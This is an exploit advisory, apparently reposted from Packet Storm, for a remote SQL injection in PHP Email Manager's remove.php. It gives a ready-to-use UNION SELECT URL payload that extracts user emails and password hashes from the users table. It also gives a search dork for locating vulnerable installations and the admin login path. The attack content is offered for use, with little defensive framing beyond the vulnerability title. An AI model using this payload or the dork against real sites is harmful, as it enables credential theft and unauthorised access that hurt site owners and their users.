PHP Email Manager suffers from a remote SQL injection vulnerability in remove.php.
7b980331fd191ef070e4bc3d1164d223ae22f053a7b172a010c5004ea6a984b7===========================================|->
~ Mtrb3 hena [Security-Code] ~
===========================================|->
script :-> PHP Email Manager < Remote SQL Injection Vulnerability >
Downlode:->http://webscripts.softpedia.com/script/Mailing-List-Managers/PHP-eMail-Manager-30652.html
Dork:->PHPEmailManager
Found by :-> [ MuShTaQ ]
from :-> [WwW.SeC-CoDe.com]
C0ntact :a7m@mail.com
===========================================|->
~ Exploit ~
===========================================|->
File :-> http//www.site.com/PHPEmailManager/remove.php?ID=[SQL]
Exploit:-> http://www.site.com/PHPEmailManager/remove.php?ID=-1+union+select+1,concat%28Email,0x3a,PasswordHash%29,3,4,5,6,7,8,9,10,11+from+php_email_man_Users--
Admin Login:-> http//www.site.com/PHPEmailManager/login.php
-:::::::::::::::::: GreeetZ:::::::::::::::::-
Sniper.vb , Mr.Nrfzh,and all friends
Bay Bay
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed